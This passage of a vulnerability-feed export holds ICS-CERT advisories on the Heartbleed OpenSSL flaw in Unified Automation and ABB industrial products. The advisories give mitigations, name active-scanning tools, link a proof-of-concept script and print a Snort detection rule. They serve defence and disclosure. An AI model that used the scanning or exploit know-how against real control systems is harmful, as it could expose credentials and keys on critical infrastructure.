of OPC UA SDK is vulnerable to OpenSSL vulnerability. A missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability could read data passed to this device to include the user credentials and cryptographic keys.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nUnified Automation GmbH is a German-based company with SDKs sold worldwide and a majority of customers in Europe and the United States. SDKs are used in critical manufacturing and energy sectors. The SDKs are used by manufacturers of programmable logic controllers, human-machine interface/supervisory control and data acquisition, Data Logging and Supervisory Control (DSC) systems and some manufacturing execution systems (MES) vendors.\n\nThe affected products, C++ based OPC UA SDK V1.4.0 (Windows) and ANSI C-based OPC UA SDK V1.4.0, are software development kits for OPC. Unified Automation offers products and services in the field of standardized communication in automation industry.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe C++ UA OPC SDK and ANSI C OPC SDK V1.4.0 use the vulnerable version of OpenSSL 1.0.1f. This affects the use of HTTPS connections, if enabled.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nUnified Automation recommends the following solutions for customers using the HTTPS functionality:\n\n * Disable HTTPS transport by configuration in the C++ SDK (default),\n * Recompile the SDK without HTTPs Support (default), or\n * Download the current version of OpenSSL from [http://www.openssl.org](<http://www.openssl.org/>) or the personal download area on the Unified Automation web site and recompile the SDK.\n\nFurther information from Unified Automation can be found on its web site:\n\n<http://www.unified-automation.com/news/news-details/article/1139-heartbleed-bug-in-openssl.html>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed May 15, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed May 15, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>), web site last accessed May 15, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-05-15T00:00:00", "title": "Unified Automation OPC SDK OpenSSL Vulnerability", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-135-04", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-135-04", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-06T20:02:12", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-126-01A ABB Relion 650 Series OpenSSL Vulnerability (Update A)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-126-01A&site_name=ICS-CERT", "http://www.abb.com/substationautomation", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "http://www.abb.com/cawp/abbzh254/2c9d1261d9fa1dcfc1257950002e4fbf.aspx", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-126-01A ABB Relion 650 Series OpenSSL Vulnerability (Update A)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-126-01A&site_name=ICS-CERT", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-126-01A", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-126-01A", "http://ics-cert.us-cert.gov/", "http://cwe.mitre.org/data/definitions/119.html", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-126-01A ABB Relion 650 Series OpenSSL Vulnerability (Update A)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-126-01A&site_name=ICS-CERT", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-126-01A", "http://www.us-cert.gov/privacy/", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks"], "description": "## OVERVIEW\n\n### **\\--------- Begin Update A Part 1 of 2--------**\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-14-126-01 ABB Relion 650 Series OpenSSL Vulnerability, that was published May 06, 2014, on the NCCIC/ICS-CERT web site.\n\nABB has identified an OpenSSL vulnerability in its Relion 650 series application and has issued maintenance Release 650 series Ver 1.3.0.1 to mitigate this vulnerability.\n\n### **\\--------- End Update A Part 1 of 2 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following ABB Relion versions are affected:\n\n * 650 series Ver 1.3.0\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nABB is a Swiss-based company that maintains offices in several countries around the world. ABB develops products in multiple critical sectors that are deployed worldwide.\n\nThe affected product, 650 series Ver 1.3.0 family, provides protection, control, measurement, and supervision of power systems specifically supporting bay control, transformer protection, line distance protection, generator protection, busbar protection, and breaker protection. These products support the electrical sector SCADA systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFE**Ra**\n\nThe 650 series Ver 1.3.0 devices use the vulnerable version of OpenSSL 1.0.1c. This affects parts of the FTPS protocol and the tool access protocol. Both of these protocols are known to use the OpenSSL component.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score: 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\n### **\\--------- Begin Update A Part 2 of 2--------**\n\nThe ABB cybersecurity team has issued a Cyber Security Advisory and software maintenance Release 650 series Ver. 1.3.0.1, in order to provide adequate protection to ABB 650 series customers. ABB recommends that this maintenance release be applied, based on customers risk assessment and exposure of the system.\n\nFor more information, please see the ABB Cyber Security Advisory on the ABB Cyber Security Alerts & Notifications web page at:\n\n<http://www.abb.com/cawp/abbzh254/2c9d1261d9fa1dcfc1257950002e4fbf.aspx>\n\nContact your local ABB customer support to obtain patch and installation support.\n\n### **\\--------- End Update A Part 2 of 2 ----------**\n\nIf user-defined accounts have been used, the passwords of those should be changed. It is also advised that cryptographic keys are regenerated by temporarily changing IP-address or IEC61850 name of the device.\n\nAdditional information is available from the ABB service organizations listed at: <http://www.abb.com/substationautomation>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed May 06, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed May 06, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>), web site last visited May 06, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-07-08T00:00:00", "title": "ABB Relion 650 Series OpenSSL Vulnerability (Update A)", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-126-01A", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-126-01A", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T01:37:35", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-05", "https://github.com/sensepost/heartbleed-poc", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "http://digital-forensics.sans.org/blog/2014/04/10/heartbleed-links-simulcast-etc/", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://cwe.mitre.org/data/definitions/125.html", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-135-05 OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-05&site_name=ICS-CERT", "https://ics-cert.us-cert.gov/Report-Incident?", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01E", "http://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-135-05 OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-05&site_name=ICS-CERT", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://www.netscape.com/eng/ssl3/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "https://www.openssl.org/news/secadv_20140407.txt", "http://www.opensource.org/", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-05", "http://ics-cert.us-cert.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-05", "http://www.openssl.org/news/vulnerabilities.html", "http://heartbleed.com/", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-135-05 OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-05&site_name=ICS-CERT", "http://www.crowdstrike.com/community-tools/index.html", "http://www.us-cert.gov/privacy/", "http://ics-cert.us-cert.gov/sites/default/files/documents/FBI%20Private%20Industry%20Notice-140416-002.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160", "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/", "http://www.dhs.gov", "http://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "http://www.dhs.gov/report-cyber-risks", "http://www.snort.org/snort-rules/#community"], "description": "## OVERVIEW\n\nThis advisory is a follow-up to the updated alert titled [ICS-ALERT-14-099-01E Situational Awareness Alert for OpenSSL Vulnerability](<https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01E>) that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nThe OpenSSL (Heartbleed) vulnerability was independently identified by both Neel Mehta of Google Security on April 1, 2014, and 2 days later by a team of security engineers Riku, Antti, and Matti at Codenomicon.a b The OpenSSL (Heartbleed) vulnerability has been identified in OpenSSL Versions 1.0.1 through 1.0.1f and 1.0.2-beta1 that contain a flaw in the implementation of the transport layer security/datagram transport layer security (TLS/DTLS) heartbeat functionality. OpenSSL Version 1.0.1g addresses and mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following OpenSSL libraries are affected:\n\n * OpenSSL Versions 1.0.1 through 1.0.1f and 1.0.2-beta1\n\nICS-CERT has produced an OpenSSL affected/unaffected products list that specifies which vendors, products, and product versions are affected by the OpenSSL vulnerability. This document also contains a list of vendors, products, and product versions that has evaluated their products and have asserted that their products are not affected by the OpenSSL vulnerability. This document will be updated as needed. The location of this document is as follows:\n\nhttps://ics-cert.us-cert.gov/file_attach/ICSA-14-135-05.xlsx\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nThe OpenSSL Project is an ongoing volunteer-driven collaborative multinational development effort for the [Open Source](<http://www.opensource.org/>) toolkit, implementing the s[ecure sockets layer](<http://www.netscape.com/eng/ssl3/>) (SSL) and TLS protocols, as well as a general purpose cryptography library. The Open Source toolkit is known to be deployed in some secure communication devices used in ICS networks.\n\nThe ideal ICS network is isolated from the enterprise network and contains little to no external communication connections; however, business demands are requiring increased communication with the ICS network from external networks. These external communication connections are susceptible to the OpenSSL vulnerability, which could be used to exfiltrate credentials for access to components on the ICS network. The OpenSSL vulnerability can be present in hosts, clients, and client software. If ICS network credentials are exfiltrated, which can be done with the successful exploitation of the OpenSSL vulnerability, it is possible for an attacker to exercise substantial control over an ICS network. It is extremely common for a set of ICS credentials to have nearly unlimited access throughout the ICS network, which is different from IT networks that typically limit user access to execute job specific duties.\n\nExternal connections commonly used in the ICS network include VPN connections, database and web interfaces, and secure FTP and other secure data transfer connections. There are three general guidelines that can be applied to determine a starting point for evaluating ICS networks for the OpenSSL vulnerability:\n\n 1. Any component connected to the ICS network that offers secure external communication should be evaluated;\n 2. Any component connected to the ICS network that was deployed or last updated prior to 2012 will not have the OpenSSL vulnerability because the OpenSSL vulnerability did not exist prior to 2012; and\n 3. Any component connected to the ICS network that is based on Microsoft technologies may not be vulnerable because Microsoft does not typically use OpenSSL.\n\nSpecific types of networking equipment have been determined to be more likely to contain the OpenSSL vulnerability and they are as follows:\n\n * Network gear that is managed;\n * Communication gear that encrypts;\n * PLCs with built in Ethernet/web cards with secure web connections;\n * PLCs with add-on Ethernet/web cards with secure web connections;\n * Database and web interfaces to customers, vendors, and enterprise resource planning interfaces;\n * Secure data transfer servers; and\n * Virtual private network connections directly into ICS networks or routed through the enterprise firewalls into ICS networks.\n\nAsset owners and operators that are unsure of the vulnerability of ICS networking equipment or if they suspect networking equipment of containing the OpenSSL vulnerability, should contact their product vendor.\n\nICS-CERT is tracking products affected by the OpenSSL vulnerability in the OpenSSL affected/unaffected products list. In regards to the products ICS-CERT is currently working with, the ratio of affected products to products not affected is small; however, the OpenSSL vulnerability is known to affect a large number of traditional IT-based secure communication equipment. The OpenSSL toolkit is deployed globally.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### OUT OF BOUNDS READc\n\nA flaw in the implementation of OpenSSL could allow the private key used in SSL to be exposed. An attacker could then decrypt and read any secure data passed on the network link.\n\nThe vulnerability exists in the Heartbeat extension (RFC6520) of OpenSSL\u2019s TLS and the DTLS protocols. The Heartbeat extension is functionally a \u201ckeep-alive\u201d between end-users and the secure server. It works by sending periodic \u201cdata pulses\u201d of 64 KB in size to the secure server, and once the server receives that data; it reciprocates by resending the same data at the same size.d\n\nThe out-of-bounds \u201cread\u201d vulnerability exists because the Heartbeat extension does not properly validate the data being sent from the end-user. As a result, a malicious actor could send a specially crafted Heartbeat request to the vulnerable server and obtain sensitive information stored in memory on the server. Furthermore, even though each heartbeat only allows requests to have a data size limited to 64 kB segments, it is possible to send repeated requests to retrieve more 64 kB segments, which could include encryption keys used for certificates, passwords, usernames, and even sensitive content that were stored at the time. An attacker could harvest enough data from the 64 kB segments to piece together larger groupings of information, which could help an attacker develop a broader understanding of the information being acquired.e\n\nCVE-2014-0160f has been assigned. A CVSS score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).g\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill level would be able to exploit this vulnerability with publicly available information, tutorials, and exploit tools.\n\n## MITIGATION\n\nOpenSSL Version 1.0.1g has addressed and mitigates this vulnerability. Asset owners and operators should contact their product vendor to check for availability of updates. Any system that may be affected by this vulnerability should regenerate any credential information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items.\n\nOlder versions of OpenSSL may not be vulnerable to the Heartbleed attacks, but have other known vulnerabilities that could be exploited. ICS-CERT strongly suggests that asset owners and operators verify what versions are running in the products being used in their facilities and then reference the following web site to determine which patched versions of OpenSSL should be used for the most secure operation. If there are still questions about what version is being used, contact the product vendor for verification.\n\n<http://www.openssl.org/news/vulnerabilities.html>\n\n## DEVELOPERS\n\nUpgrade affected TLS/TDLS clients and servers to OpenSSL Version 1.0.1g. Alternatively, affected versions of OpenSSL may be recompiled with the option \n\u201c-DOPENSSL_NO_HEARTBEATS\u201d to mitigate the vulnerability until an upgrade can be performed.\n\n## OPENSSL SCANNING IN ICS ENVIRONMENTS\n\nAsset owners and operators may need to scan the devices used in their ICS environment if they implement end-of-life devices or their vendor is not communicating with them on this issue. Scanning can be completed in two different ways, active and passive scanning. Both scanning methods are dangerous when used in an ICS environment due to the sensitive nature of these devices. ICS-CERT advises that all scanning of ICS devices for Heartbleed be done in an isolated test laboratory, not in the production environment. If a test environment is not available then the device vendor should be contacted. When it is possible to scan the device, it is possible that device could be put into invalid state causing unexpected results and possible failure of safety safeguards.\n\nScanning of the VPN used to connect into ICS environments should be the highest priority. If a VPN is vulnerable to Heartbleed, it is possible for an attacker to retrieve the information required to hijack a current user\u2019s session and circumvent any form of authentication used by the VPN, including two-factor authentication.\n\nActively attempting to exploit the OpenSSL vulnerability is the quickest and most reliable method for identifying vulnerable systems, but it is also the most dangerous method of scanning. Multiple tools and scripts have been written to only request 16 kB and to check if a longer than normal Heartbeat request is returned. There are numerous OpenSSL scanning tools available and three free to use active-scanning tools that accurately identify the presence of the OpenSSL vulnerability include: CrowdStrike Heartbleed Scanner, Nmap NSE Script for Heartbleed, and Heartbleed-POC.py.\n\nThe CrowdStrike Heartbleed Scanner (<http://www.crowdstrike.com/community-tools/index.html>) is a Windows application that scans multiple hosts concurrently and provides a clear vulnerable/not-vulnerable indicator for each host scanned. An Nmap NSE Script for Heartbleed is available for Windows, OS X, and Linux/Unix (ICS-CERT has only tested the script on Linux) allowing for testing a large number of hosts at once. Finally, an open source python script called \u201cHeartbleed-POC.py\u201d provides a method of scanning a single host. The latter two scripts can be found at (<https://github.com/sensepost/heartbleed-poc>).\n\nA lower-risk method is passively scanning for devices that are susceptible to this attack. This approach could involve submitting devices\u2019 firmware and SSL applications to online code scanners or capturing and analyzing network traffic. Codenomicon released a web application that will scan small firmware updates or applications to determine if a vulnerable version of OpenSSL is used. This is the only method known to be safe for ICS environments but requires knowledge of the firmware version used on all devices and the ability to download those versions from vendors.\n\nUncovering the existence of the OpenSSL vulnerability is difficult through network monitoring unless it can be determined that a device or application is being actively exploited. To make this effort even more difficult, researchers have suggested some methods to obfuscate attack traffic. Considering these challenges, a few criteria can be used to possibly determine if a host is likely vulnerable. Unfortunately, this cannot be used to ascertain if the host is not vulnerable unless it was produced or last updated before March 2012. The criteria are as follows:\n\n * Host is using OpenSSL (unknown version);\n * No patching has been done since April 4th;\n * Host has been produced or updated since March 2012; and\n * Heartbeat extension is supported (packet filters can be used to detect heartbeat messages).\n\nIt should also be noted that capturing network traffic from an ICS environment can cause increases in network delays that may result in process malfunction.\n\n## DETECTION SIGNATURES\n\nContact equipment vendors for specific mitigation information as the implementations may vary. In addition, IDS signatures are available that may provide awareness of an attack of this nature occurring. An example of these rule sets can be found hereh:\n\nalert tcp any [!80,!445] -> any [!80,!445] (msg:\"FOX-SRT - Suspicious - SSLv3 Large Heartbeat Response\"; flow:established,to_client; content:\"|18 03 00|\"; depth: 3; byte_test:2, >, 200, 3, big; byte_test:2, <, 16385, 3, big; threshold:type limit, track by_src, count 1, seconds 600; reference:cve,2014-0160; classtype:bad-unknown; sid: 1000000; rev:4;)\n\nAdditional Snort signatures have been provided by the FBI, Mitigation against Open Secure Socket Layer Heartbeat Extension Vulnerability, at:\n\n<http://ics-cert.us-cert.gov/sites/default/files/documents/FBI%20Private%20Industry%20Notice-140416-002.pdf>\n\nSnort community rules can be found at:\n\n<http://www.snort.org/snort-rules/#community>.\n\nAdditional indicators of compromise are available on the Control Systems compartment of the US-CERT secure portal for owners and operators of critical infrastructure. ICS-CERT encourages U.S. asset owners and operators to join the Control Systems compartment of the US\u2011CERT secure portal. Send your name, email address, and company affiliation to \n[ics-cert@hq.dhs.gov](<mailto:ics-cert@hq.dhs.gov>).\n\n**NOTE: ICS-CERT has not tested the validity or efficacy of these rule sets and cautions users to thoroughly test these solutions before implementing them into production environments!**\n\n## USE OF SPECIALIZED SEARCH ENGINES\n\nEven prior to the discovery of the OpenSSL vulnerability, Internet facing devices have been a serious concern over the past few years with remote access demands giving way to insecure or vulnerable configurations. Tools; such as SHODAN, Google, and other search engines; enable researchers and adversaries to easily discover and identify a variety of ICS devices that were not intended to be Internet facing. This is due in part to ICS terminology and search terms that have become widely available because of an increasing public body of knowledge with detailed ICS information. Adding to the threat landscape is SHODAN\u2019s linkages to exploit databases as well as continuous scanning and cataloguing of devices with emerging vulnerabilities such as DNP3 and OpenSSL. The availability of public information coupled with the aforementioned tools, lowers the level of knowledge required to successfully locate Internet facing control systems. In many cases, these devices have not been configured with adequate authentication mechanisms, thereby further increasing the chances of both opportunistic and targeted attempts to directly access these components.\n\nTools such as SHODAN may be proactively used by owners, operators, and security personnel to audit their networks and devices to locate Internet facing control system devices that may be susceptible to compromise. Asset owners are encouraged to query various search engines using the vendor product, model, and version of a device, to determine if their IP address block is found within the search results. If control systems devices are found using these tools, asset owners should take the necessary steps to remove these devices from direct or unsecured Internet access as soon as possible.\n\nAs tools and adversary capabilities advance, ICS-CERT expects that exposed systems will be more effectively discovered, and targeted. It has become more important than ever for asset owners and operators to audit their network configurations and properly install their ICS devices behind patched VPNs or firewalls.\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.i\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures.\n\nICS-CERT also provides a [recommended practices section for control systems](<http://ics-cert.us-cert.gov/content/recommended-practices>) on the ICS-CERT web site ([http://ics-cert.us-cert.gov](<http://ics-cert.us-cert.gov/>)). Several recommended practices are available for reading or download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<http://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nOrganizations that observe any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. <https://www.openssl.org/news/secadv_20140407.txt>, web site last accessed May 15, 2014.\n * b. <http://heartbleed.com/>, web site last accessed May 15, 2014.\n * c. CWE-125: Out of Bounds Read, <https://cwe.mitre.org/data/definitions/125.html>, web site last accessed May 15, 2014.\n * d. CVE, <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>, web site last accessed May 15, 2014.\n * e. SANS OpenSSL Vulnerability, [http://digital-forensics.sans.org/blog/2014/04/10/heartbleed-links-simul...](<http://digital-forensics.sans.org/blog/2014/04/10/heartbleed-links-simulcast-etc/>), web site last accessed May 15, 2014.\n * f. CVE, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed May 15, 2014.\n * g. NVD, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>), web site last accessed May 15, 2014.\n * h. IDS signature examples, <http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/>, web site last accessed May 15, 2014.\n * i. ICS-CERT ALERT, <http://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01>, web site last accessed May 15, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-05-15T00:00:00", "title": "OpenSSL Vulnerability", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-08-27T00:00:00", "id": "ICSA-14-135-05", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-135-05", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:00", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html", "http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html", "http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489", "http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190", "http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574"], "description": "Software maker and database management company Oracle yesterday released its quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). The release resolves more than 100 security vulnerabilities, many of which received high common vulnerability scoring system base scores and should be applied as soon as possible.\n\nProducts affected by the patch include but are not limited to Oracle Database, Fusion Middleware, Hyperion, Supply Chain Product Suite, iLearning, PeopleSoft Enterprise, Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, and Oracle MySQL.\n\nLast week, Oracle released a [list of products](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) affected by the [Heartbleed OpenSSL 